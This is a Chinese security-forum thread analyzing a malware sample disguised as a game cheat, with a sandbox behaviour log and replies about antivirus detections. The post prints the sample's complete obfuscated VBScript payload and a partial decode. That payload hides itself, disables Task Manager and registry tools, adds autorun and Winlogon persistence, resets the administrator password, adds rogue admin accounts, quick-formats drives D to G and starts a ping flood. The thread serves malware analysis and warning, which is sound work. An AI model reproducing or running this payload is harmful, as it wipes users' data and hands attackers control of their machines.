收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 技术含量不高的敲竹杠,目测破坏很大,实机运行警告!
1234下一页
返回列表 发新帖
查看: 6145|回复: 33
收起左侧

[病毒样本] 技术含量不高的敲竹杠,目测破坏很大,实机运行警告!

  [复制链接]
zhou0197
发表于 2016-3-28 21:57:44 | 显示全部楼层 |阅读模式
本帖最后由 zhou0197 于 2016-3-28 22:13 编辑

上样本:

切勿实机运行!!!!!

部分杀软报ramnit,虚拟机测试似乎未发现相关行为?各位谨慎!

虚拟机部分行为:

2016-3-28 21:21:29    创建新进程    允许
进程: c:\windows\explorer.exe
目标: c:\documents and settings\zhou\桌面\由乃cf20透视辅助.exe
命令行: "C:\Documents and Settings\zhou\桌面\由乃CF20透视辅助.exe"
规则: [应用程序]*

2016-3-28 21:21:30    创建新进程    允许
进程: c:\documents and settings\zhou\桌面\由乃cf20透视辅助.exe
目标: c:\windows\system32\conime.exe
命令行: C:\WINDOWS\system32\conime.exe
规则: [应用程序]*

2016-3-28 21:21:34    创建文件    允许
进程: c:\documents and settings\zhou\桌面\由乃cf20透视辅助.exe
目标: C:\Documents and Settings\zhou\Local Settings\Temp\1.tmp\svchost.vbs
规则: [文件组]所有执行文件 -> [文件]*; *.vbs

2016-3-28 21:21:36    向其他进程发送消息    允许
进程: c:\windows\system32\conime.exe
目标: c:\documents and settings\zhou\桌面\由乃cf20透视辅助.exe
消息: WM_COPYDATA
规则: [应用程序]*

2016-3-28 21:21:42    创建新进程    允许
进程: c:\documents and settings\zhou\桌面\由乃cf20透视辅助.exe
目标: c:\windows\system32\cscript.exe
命令行: "cscript" "C:\Documents and Settings\zhou\Local Settings\Temp\1.tmp\svchost.vbs"
规则: [应用程序]*

2016-3-28 21:21:43    向其他进程发送消息    允许
进程: c:\windows\system32\conime.exe
目标: c:\documents and settings\zhou\桌面\由乃cf20透视辅助.exe
消息: WM_COPYDATA
规则: [应用程序]*

2016-3-28 21:21:49    创建文件    允许
进程: c:\windows\system32\cscript.exe
目标: C:\svchost.vbs
规则: [文件]?:\

2016-3-28 21:21:52    创建新进程    允许
进程: c:\windows\system32\cscript.exe
目标: c:\windows\system32\attrib.exe
命令行: "C:\WINDOWS\system32\attrib.exe" +s +h +a +r c:\svchost.vbs
规则: [应用程序]*

2016-3-28 21:21:54    向其他进程发送消息    允许
进程: c:\windows\system32\conime.exe
目标: c:\windows\system32\attrib.exe
消息: WM_COPYDATA
规则: [应用程序]*

2016-3-28 21:21:57    创建文件    允许
进程: c:\windows\system32\cscript.exe
目标: C:\windows\system32\svchost.vbs
规则: [文件组]所有执行文件 -> [文件]*; *.vbs

2016-3-28 21:21:59    设置文件隐藏属性    允许
进程: c:\windows\system32\attrib.exe
目标: C:\svchost.vbs
规则: [文件]?:\

2016-3-28 21:22:02    创建新进程    允许
进程: c:\windows\system32\cscript.exe
目标: c:\windows\system32\attrib.exe
命令行: "C:\WINDOWS\system32\attrib.exe" +s +h +a +r c:\windows\system32\svchost.vbs
规则: [应用程序]*

2016-3-28 21:22:03    向其他进程发送消息    允许
进程: c:\windows\system32\conime.exe
目标: c:\windows\system32\attrib.exe
消息: WM_COPYDATA
规则: [应用程序]*

2016-3-28 21:22:15    修改注册表值    允许
进程: c:\windows\system32\cscript.exe
目标: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools
值: 0x00000001(1)
规则: [注册表组]系统设置 -> [注册表]HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\*

2016-3-28 21:22:18    设置文件隐藏属性    允许
进程: c:\windows\system32\attrib.exe
目标: C:\WINDOWS\system32\svchost.vbs
规则: [文件组]所有执行文件 -> [文件]*; *.vbs

2016-3-28 21:22:20    修改注册表值    允许
进程: c:\windows\system32\cscript.exe
目标: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr
值: 0x00000001(1)
规则: [注册表组]系统设置 -> [注册表]HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\*

2016-3-28 21:22:24    修改注册表值    允许
进程: c:\windows\system32\cscript.exe
目标: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\start page
值: http://www.abc123.com
规则: [注册表组]IE浏览器设置 -> [注册表]HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\*

2016-3-28 21:22:26    创建注册表项    允许
进程: c:\windows\system32\cscript.exe
目标: HKEY_CURRENT_USER\software\policies\microsoft\internet explorer\control panel
规则: [注册表组]系统设置 -> [注册表]HKEY_CURRENT_USER\Software\Policies\*

2016-3-28 21:22:29    创建注册表项    允许
进程: c:\windows\system32\cscript.exe
目标: HKEY_CURRENT_USER\Software\Policies\Microsoft\internet explorer
规则: [注册表组]系统设置 -> [注册表]HKEY_CURRENT_USER\Software\Policies\*

2016-3-28 21:22:30    创建注册表项    允许
进程: c:\windows\system32\cscript.exe
目标: HKEY_CURRENT_USER\Software\Policies\Microsoft\internet explorer\control panel
规则: [注册表组]系统设置 -> [注册表]HKEY_CURRENT_USER\Software\Policies\*

2016-3-28 21:22:33    修改注册表值    允许
进程: c:\windows\system32\cscript.exe
目标: HKEY_CURRENT_USER\Software\Policies\Microsoft\internet explorer\control panel\homepage
值: 0x00000001(1)
规则: [注册表组]系统设置 -> [注册表]HKEY_CURRENT_USER\Software\Policies\*

2016-3-28 21:22:36    修改注册表值    允许
进程: c:\windows\system32\cscript.exe
目标: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\svchost
值: c:\svchost.vbs
规则: [注册表组]自动运行程序所在位置 -> [注册表]HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\*

2016-3-28 21:22:45    修改注册表值    允许
进程: c:\windows\system32\cscript.exe
目标: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell
值: c:\windows\system32\svchost.vbs
规则: [注册表组]自动运行程序所在位置 -> [注册表]HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon; Shell

2016-3-28 21:23:01    创建新进程    允许
进程: c:\windows\system32\cscript.exe
目标: c:\windows\system32\cmd.exe
命令行: "C:\WINDOWS\system32\cmd.exe" /c net user administrator TakaHirozen.521
规则: [应用程序]*

2016-3-28 21:23:09    创建新进程    允许
进程: c:\windows\system32\cscript.exe
目标: c:\windows\system32\cmd.exe
命令行: "C:\WINDOWS\system32\cmd.exe" /c net user QQ962308082 ToyaAkira.521 /add
规则: [应用程序]*

2016-3-28 21:23:18    创建新进程    允许
进程: c:\windows\system32\cmd.exe
目标: c:\windows\system32\net.exe
命令行: net user administrator TakaHirozen.521
规则: [应用程序]*

2016-3-28 21:23:20    创建新进程    允许
进程: c:\windows\system32\cscript.exe
目标: c:\windows\system32\cmd.exe
命令行: "C:\WINDOWS\system32\cmd.exe" /c net localgroup administrators QQ962308082 /add
规则: [应用程序]*

2016-3-28 21:23:23    创建新进程    允许
进程: c:\windows\system32\cmd.exe
目标: c:\windows\system32\net.exe
命令行: net user QQ962308082 ToyaAkira.521 /add
规则: [应用程序]*

2016-3-28 21:23:28    创建新进程    允许
进程: c:\windows\system32\cscript.exe
目标: c:\windows\system32\cmd.exe
命令行: "C:\WINDOWS\system32\cmd.exe" /c net user 重装系统会 Kikyo.net /add
规则: [应用程序]*

2016-3-28 21:23:32    创建新进程    允许
进程: c:\windows\system32\cmd.exe
目标: c:\windows\system32\net.exe
命令行: net localgroup administrators QQ962308082 /add
规则: [应用程序]*

2016-3-28 21:23:39    创建新进程    允许
进程: c:\windows\system32\cscript.exe
目标: c:\windows\system32\cmd.exe
命令行: "C:\WINDOWS\system32\cmd.exe" /c net user 格式化全硬盘 Mirainikki /add
规则: [应用程序]*

2016-3-28 21:23:44    创建新进程    允许
进程: c:\windows\system32\cmd.exe
目标: c:\windows\system32\net.exe
命令行: net user 重装系统会 Kikyo.net /add
规则: [应用程序]*

2016-3-28 21:23:56    创建新进程    允许
进程: c:\windows\system32\cscript.exe
目标: c:\windows\system32\cmd.exe
命令行: "C:\WINDOWS\system32\cmd.exe" /c format d: /q /u /x /y
规则: [应用程序]*

2016-3-28 21:23:59    创建新进程    允许
进程: c:\windows\system32\cmd.exe
目标: c:\windows\system32\net.exe
命令行: net user 格式化全硬盘 Mirainikki /add
规则: [应用程序]*

2016-3-28 21:24:04    创建新进程    允许
进程: c:\windows\system32\cscript.exe
目标: c:\windows\system32\cmd.exe
命令行: "C:\WINDOWS\system32\cmd.exe" /c format e: /q /u /x /y
规则: [应用程序]*

2016-3-28 21:24:07    创建新进程    允许
进程: c:\windows\system32\cmd.exe
目标: c:\windows\system32\format.com
命令行: format d: /q /u /x /y
规则: [应用程序]*

2016-3-28 21:24:09    创建新进程    允许
进程: c:\windows\system32\cscript.exe
目标: c:\windows\system32\cmd.exe
命令行: "C:\WINDOWS\system32\cmd.exe" /c format f: /q /u /x /y
规则: [应用程序]*

2016-3-28 21:24:11    创建新进程    允许
进程: c:\windows\system32\cmd.exe
目标: c:\windows\system32\format.com
命令行: format e: /q /u /x /y
规则: [应用程序]*

2016-3-28 21:24:12    底层磁盘读操作    允许
进程: c:\windows\system32\format.com
目标: \Device\HarddiskVolume2
规则: [应用程序]*

2016-3-28 21:24:14    创建新进程    允许
进程: c:\windows\system32\cscript.exe
目标: c:\windows\system32\cmd.exe
命令行: "C:\WINDOWS\system32\cmd.exe" /c format g: /q /u /x /y
规则: [应用程序]*

2016-3-28 21:24:16    创建新进程    允许
进程: c:\windows\system32\cmd.exe
目标: c:\windows\system32\format.com
命令行: format f: /q /u /x /y
规则: [应用程序]*

2016-3-28 21:24:16    底层磁盘读操作    允许
进程: c:\windows\system32\format.com
目标: \Device\HarddiskVolume3
规则: [应用程序]*

2016-3-28 21:24:21    底层磁盘读操作    允许
进程: c:\windows\system32\format.com
目标: \Device\HarddiskVolume2
规则: [应用程序]*

2016-3-28 21:24:22    创建新进程    允许
进程: c:\windows\system32\cmd.exe
目标: c:\windows\system32\format.com
命令行: format g: /q /u /x /y
规则: [应用程序]*

2016-3-28 21:24:26    创建新进程    允许
进程: c:\windows\system32\cscript.exe
目标: c:\windows\system32\ping.exe
命令行: "C:\WINDOWS\system32\ping.exe" -t -l 65000 192.168.1.1
规则: [应用程序]*

2016-3-28 21:24:27    底层磁盘读操作    允许
进程: c:\windows\system32\format.com
目标: \Device\HarddiskVolume3
规则: [应用程序]*

2016-3-28 21:24:28    底层磁盘读操作    允许
进程: c:\windows\system32\format.com
目标: \Device\HarddiskVolume2
规则: [应用程序]*

2016-3-28 21:24:29    向其他进程发送消息    允许
进程: c:\windows\system32\conime.exe
目标: c:\windows\system32\ping.exe
消息: WM_COPYDATA
规则: [应用程序]*

2016-3-28 21:24:31    创建新进程    允许
进程: c:\windows\system32\cscript.exe
目标: c:\windows\system32\ping.exe
命令行: "C:\WINDOWS\system32\ping.exe" -t -l 65000 192.168.1.1
规则: [应用程序]*

2016-3-28 21:24:34    底层磁盘读操作    允许
进程: c:\windows\system32\format.com
目标: \Device\HarddiskVolume3
规则: [应用程序]*

2016-3-28 21:24:38    向其他进程发送消息    允许
进程: c:\windows\system32\conime.exe
目标: c:\windows\system32\ping.exe
消息: WM_COPYDATA
规则: [应用程序]*

2016-3-28 21:24:40    创建新进程    允许
进程: c:\windows\system32\cscript.exe
目标: c:\windows\system32\ping.exe
命令行: "C:\WINDOWS\system32\ping.exe" -t -l 65000 192.168.1.1
规则: [应用程序]*

2016-3-28 21:24:45    底层磁盘写操作    允许
进程: c:\windows\system32\format.com
目标: \Device\HarddiskVolume2
规则: [应用程序]*

2016-3-28 21:25:24    创建新进程    允许
进程: c:\windows\system32\ping.exe
目标: c:\windows\system32\conime.exe
命令行: C:\WINDOWS\system32\conime.exe
规则: [应用程序]*


核心vbs源码:

HqwStr = Array(13,10,13,10,83,101,116,32,111,98,106,70,83,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,83,99,114,105,112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109,79,98,106,101,99,116,34,41,13,10,13,10,83,101,116,32,111,98,106,70,83,79,32,61,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,83,99,114,105,112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,109,79,98,106,101,99,116,34,41,13,10,13,10,115,101,116,32,119,115,104,61,119,115,99,114,105,112,116,46,99,114,101,97,116,101,111,98,106,101,99,116,40,34,119,115,99,114,105,112,116,46,115,104,101,108,108,34,41,13,10,13,10,115,101,116,32,114,101,103,61,119,115,99,114,105,112,116,46,99,114,101,97,116,101,111,98,106,101,99,116,40,34,119,115,99,114,105,112,116,46,115,104,101,108,108,34,41,13,10,13,10,100,105,109,32,119,115,104,13,10,13,10,97,61,87,83,99,114,105,112,116,46,83,99,114,105,112,116,70,117,108,108,78,97,109,101,13,10,13,10,99,61,34,99,58,92,115,118,99,104,111,115,116,46,118,98,115,34,13,10,13,10,115,61,34,99,58,92,119,105,110,100,111,119,115,92,115,121,115,116,101,109,51,50,92,115,118,99,104,111,115,116,46,118,98,115,34,13,10,13,10,99,49,61,34,97,116,116,114,105,98,32,43,115,32,43,104,32,43,97,32,43,114,32,99,58,92,115,118,99,104,111,115,116,46,118,98,115,34,13,10,13,10,115,49,61,34,97,116,116,114,105,98,32,43,115,32,43,104,32,43,97,32,43,114,32,99,58,92,119,105,110,100,111,119,115,92,115,121,115,116,101,109,51,50,92,115,118,99,104,111,115,116,46,118,98,115,34,13,10,13,10,73,102,32,111,98,106,70,83,79,46,70,105,108,101,69,120,105,115,116,115,32,40,99,41,32,84,104,101,110,13,10,13,10,69,108,115,101,13,10,13,10,111,98,106,70,115,46,71,101,116,70,105,108,101,32,40,97,41,46,67,111,112,121,32,40,99,41,13,10,13,10,119,115,104,46,114,117,110,32,99,49,13,10,13,10,69,110,100,32,73,102,13,10,13,10,73,102,32,111,98,106,70,83,79,46,70,105,108,101,69,120,105,115,116,115,40,115,41,32,84,104,101,110,13,10,13,10,69,108,115,101,13,10,13,10,111,98,106,70,115,46,71,101,116,70,105,108,101,32,40,97,41,46,67,111,112,121,32,40,115,41,13,10,13,10,119,115,104,46,114,117,110,32,115,49,13,10,13,10,69,110,100,32,73,102,13,10,13,10,13,10,114,101,103,46,114,101,103,119,114,105,116,101,34,72,75,69,89,95,67,85,82,82,69,78,84,95,85,83,69,82,92,83,111,102,116,119,97,114,101,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,80,111,108,105,99,105,101,115,92,83,121,115,116,101,109,92,68,105,115,97,98,108,101,82,101,103,105,115,116,114,121,84,111,111,108,115,34,44,34,48,48,48,48,48,48,48,49,34,44,34,82,69,71,95,68,87,79,82,68,34,32,13,10,13,10,114,101,103,46,114,101,103,119,114,105,116,101,34,72,75,69,89,95,67,85,82,82,69,78,84,95,85,83,69,82,92,83,111,102,116,119,97,114,101,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,80,111,108,105,99,105,101,115,92,83,121,115,116,101,109,92,68,105,115,97,98,108,101,84,97,115,107,77,103,114,34,44,34,48,48,48,48,48,48,48,49,34,44,34,82,69,71,95,68,87,79,82,68,34,32,13,10,13,10,114,101,103,46,114,101,103,119,114,105,116,101,34,72,75,69,89,95,67,85,82,82,69,78,84,95,85,83,69,82,92,115,111,102,116,119,97,114,101,92,109,105,99,114,111,115,111,102,116,92,105,110,116,101,114,110,101,116,32,101,120,112,108,111,114,101,114,92,109,97,105,110,92,115,116,97,114,116,32,112,97,103,101,34,44,34,104,116,116,112,58,47,47,119,119,119,46,97,98,99,49,50,51,46,99,111,109,34,44,34,82,69,71,95,83,90,34,32,13,10,13,10,114,101,103,46,114,101,103,119,114,105,116,101,34,72,75,69,89,95,67,85,82,82,69,78,84,95,85,83,69,82,92,115,111,102,116,119,97,114,101,92,112,111,108,105,99,105,101,115,92,109,105,99,114,111,115,111,102,116,92,105,110,116,101,114,110,101,116,32,101,120,112,108,111,114,101,114,92,99,111,110,116,114,111,108,32,112,97,110,101,108,92,104,111,109,101,112,97,103,101,34,44,34,48,48,48,48,48,48,48,49,34,44,34,82,69,71,95,68,87,79,82,68,34,32,13,10,13,10,114,101,103,46,114,101,103,119,114,105,116,101,34,72,75,69,89,95,67,85,82,82,69,78,84,95,85,83,69,82,92,83,111,102,116,119,97,114,101,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,80,111,108,105,99,105,101,115,92,101,120,112,108,111,114,101,114,92,78,111,68,101,115,107,116,111,112,34,44,34,48,48,48,48,48,48,48,49,34,44,34,82,69,71,95,68,87,79,82,68,34,32,13,10,13,10,114,101,103,46,114,101,103,119,114,105,116,101,34,72,75,69,89,95,67,85,82,82,69,78,84,95,85,83,69,82,92,83,111,102,116,119,97,114,101,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,80,111,108,105,99,105,101,115,92,101,120,112,108,111,114,101,114,92,78,111,68,114,105,118,101,115,34,44,34,48,48,48,48,48,48,49,48,48,34,44,34,82,69,71,95,68,87,79,82,68,34,32,13,10,13,10,114,101,103,46,114,101,103,119,114,105,116,101,34,72,75,69,89,95,67,85,82,82,69,78,84,95,85,83,69,82,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,82,117,110,92,115,118,99,104,111,115,116,34,44,34,99,58,92,115,118,99,104,111,115,116,46,118,98,115,34,44,34,82,69,71,95,83,90,34,13,10,13,10,114,101,103,46,114,101,103,119,114,105,116,101,34,72,75,69,89,95,67,85,82,82,69,78,84,95,85,83,69,82,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,82,117,110,83,101,114,118,105,99,101,115,92,115,118,99,104,111,115,116,34,44,34,99,58,92,119,105,110,100,111,119,115,92,115,121,115,116,101,109,51,50,92,115,118,99,104,111,115,116,46,118,98,115,34,44,34,82,69,71,95,83,90,34,13,10,13,10,114,101,103,46,114,101,103,119,114,105,116,101,34,72,75,69,89,95,76,79,67,65,76,95,77,65,67,72,73,78,69,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,82,117,110,83,101,114,118,105,99,101,115,92,115,118,99,104,111,115,116,34,44,34,99,58,92,119,105,110,100,111,119,115,92,115,121,115,116,101,109,51,50,92,115,118,99,104,111,115,116,46,118,98,115,34,44,34,82,69,71,95,83,90,34,13,10,13,10,114,101,103,46,114,101,103,119,114,105,116,101,34,72,75,69,89,95,76,79,67,65,76,95,77,65,67,72,73,78,69,92,83,79,70,84,87,65,82,69,92,77,105,99,114,111,115,111,102,116,92,87,105,110,100,111,119,115,32,78,84,92,67,117,114,114,101,110,116,86,101,114,115,105,111,110,92,87,105,110,108,111,103,111,110,92,115,104,101,108,108,34,44,34,99,58,92,119,105,110,100,111,119,115,92,115,121,115,116,101,109,51,50,92,115,118,99,104,111,115,116,46,118,98,115,34,44,34,82,69,71,95,83,90,34,13,10,100,105,109,32,119,115,104,101,108,108,13,10,115,101,116,32,119,115,104,101,108,108,61,99,114,101,97,116,101,111,98,106,101,99,116,40,34,119,115,99,114,105,112,116,46,115,104,101,108,108,34,41,13,10,119,115,104,101,108,108,46,114,117,110,32,34,99,109,100,32,47,99,32,110,101,116,32,117,115,101,114,32,97,100,109,105,110,105,115,116,114,97,116,111,114,32,84,97,107,97,72,105,114,111,122,101,110,46,53,50,49,34,13,10,119,115,104,101,108,108,46,114,117,110,32,34,99,109,100,32,47,99,32,110,101,116,32,117,115,101,114,32,81,81,57,54,50,51,48,56,48,56,50,32,84,111,121,97,65,107,105,114,97,46,53,50,49,32,47,97,100,100,34,32,44,118,98,104,105,100,101,32,32,13,10,119,115,104,101,108,108,46,114,117,110,32,34,99,109,100,32,47,99,32,110,101,116,32,108,111,99,97,108,103,114,111,117,112,32,97,100,109,105,110,105,115,116,114,97,116,111,114,115,32,81,81,57,54,50,51,48,56,48,56,50,32,47,97,100,100,34,32,44,118,98,104,105,100,101,13,10,119,115,104,101,108,108,46,114,117,110,32,34,99,109,100,32,47,99,32,110,101,116,32,117,115,101,114,32,-10536,-10320,-12363,-12877,-17439,32,75,105,107,121,111,46,110,101,116,32,47,97,100,100,34,13,10,119,115,104,101,108,108,46,114,117,110,32,34,99,109,100,32,47,99,32,110,101,116,32,117,115,101,114,32,-18191,-13635,-17489,-14165,-11342,-14900,32,77,105,114,97,105,110,105,107,107,105,32,47,97,100,100,34,32,32,13,10,119,115,104,101,108,108,46,82,101,103,87,114,105,116,101,32,34,72,75,76,77,92,83,89,83,84,69,77,92,67,117,114,114,101,110,116,67,111,110,116,114,111,108,83,101,116,92,67,111,110,116,114,111,108,92,84,101,114,109,105,110,97,108,32,83,101,114,118,101,114,92,102,68,101,110,121,84,83,67,111,110,110,101,99,116,105,111,110,115,34,44,48,44,34,82,69,71,95,68,87,79,82,68,34,32,32,32,13,10,119,115,104,101,108,108,46,114,117,110,32,34,99,109,100,32,47,99,32,102,111,114,109,97,116,32,100,58,32,47,113,32,47,117,32,47,120,32,47,121,34,13,10,119,115,104,101,108,108,46,114,117,110,32,34,99,109,100,32,47,99,32,102,111,114,109,97,116,32,101,58,32,47,113,32,47,117,32,47,120,32,47,121,34,13,10,119,115,104,101,108,108,46,114,117,110,32,34,99,109,100,32,47,99,32,102,111,114,109,97,116,32,102,58,32,47,113,32,47,117,32,47,120,32,47,121,34,13,10,119,115,104,101,108,108,46,114,117,110,32,34,99,109,100,32,47,99,32,102,111,114,109,97,116,32,103,58,32,47,113,32,47,117,32,47,120,32,47,121,34,13,10,115,101,116,32,119,115,104,101,108,108,61,110,111,116,104,105,110,103,13,10,100,111,13,10,119,115,104,46,114,117,110,32,40,34,112,105,110,103,32,45,116,32,45,108,32,54,53,48,48,48,32,49,57,50,46,49,54,56,46,49,46,49,34,41,13,10,108,111,111,112,13,10,13,10)
Execute Num2Str(HqwStr)
Function Num2Str(HqwStr)
For I=0 To UBound(HqwStr)
Num2Str = Num2Str & Chr(HqwStr(I))
Next
End Function

部分源码解密:

Set objFS = CreateObject("Scripting.FileSystemObject")

Set objFSO = CreateObject("Scripting.FileSystemObject")

set wsh=wscript.createobject("wscript.shell")

set reg=wscript.createobject("wscript.shell")

dim wsh

a=WScript.ScriptFullName

c="c:\svchost.vbs"

s="c:\windows\system32\svchost.vbs"

c1="attrib +s +h +a +r c:\svchost.vbs"

s1="attrib +s +h +a +r c:\windows\system32\svchost.vbs"

If objFSO.FileExists (c) Then

Else

objFs.GetFile (a).Copy (c)

wsh.run c1

End If

If objFSO.FileExists(s) Then

Else

objFs.GetFile (a).Copy (s)

wsh.run s1

End If


reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","00000001","REG_DWORD"

reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","00000001","REG_DWORD"

reg.regwrite"HKEY_CURRENT_USER\software\microsoft\internet explorer\main\start page","http://www.abc123.com","REG_SZ"

reg.regwrite"HKEY_CU


虚拟机运行出现格式化硬盘行为,切勿实机运行!!!!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x

评分

参与人数 1经验 +20 收起 理由
绯色鎏金 + 20 版区有你更精彩: )

查看全部评分

回复

举报

请叫我德玛西亚
发表于 2016-3-28 22:02:02 | 显示全部楼层
这些小学生自作孽  非要用啥外{过}{滤}挂....

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

pal家族
发表于 2016-3-28 22:04:04 | 显示全部楼层
我的钛合金狗眼啊啊啊啊啊!
Kaspersky
Endpoint Security 10 for Windows
访问被拒绝
无法提供所请求的网页.

所请求的对象位于网址

https://att.kafan.cn/forum.php?mod=att...


已感染 Worm.Win32.Ramnit.vlh
消息生成日期: 22:03:33

什么鬼。。。。。
回复

举报

windows7爱好者
发表于 2016-3-28 22:08:52 | 显示全部楼层
FSP入库
DG成功击杀

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

学雷锋做人
头像被屏蔽
发表于 2016-3-28 22:10:38 | 显示全部楼层
本帖最后由 学雷锋做人 于 2016-3-28 22:13 编辑


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

zhou0197
 楼主| 发表于 2016-3-28 22:11:56 | 显示全部楼层
pal家族 发表于 2016-3-28 22:04
我的钛合金狗眼啊啊啊啊啊!
Kaspersky
Endpoint Security 10 for Windows

我的卡巴也报,但是虚拟机测试未见ramnit的明显感染行为………………难道是之前被部分修复过?
回复

举报

pal家族
发表于 2016-3-28 22:18:49 | 显示全部楼层
zhou0197 发表于 2016-3-28 22:11
我的卡巴也报,但是虚拟机测试未见ramnit的明显感染行为………………难道是之前被部分修复过?

nononono卡巴斯基对ramnit病毒从来报的不是ramnit,而是Virus.Win32.Nimnul
这个应该是某些行为很像其他的变种吧
回复

举报

zhou0197
 楼主| 发表于 2016-3-28 22:19:42 | 显示全部楼层
pal家族 发表于 2016-3-28 22:18
nononono卡巴斯基对ramnit病毒从来报的不是ramnit,而是Virus.Win32.Nimnul
这个应该是某些行为很像其他 ...

想起来了,好像是哎…………略诡异。
回复

举报

心醉咖啡
发表于 2016-3-28 22:28:28 | 显示全部楼层
毒霸kill
回复

举报

nick20010117
发表于 2016-3-28 22:29:17 | 显示全部楼层
windows7爱好者 发表于 2016-3-28 22:08
FSP入库
DG成功击杀

然而这个报毒名究竟是什么?
回复

举报

下一页 »
1234下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-15 14:52 , Processed in 0.138777 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表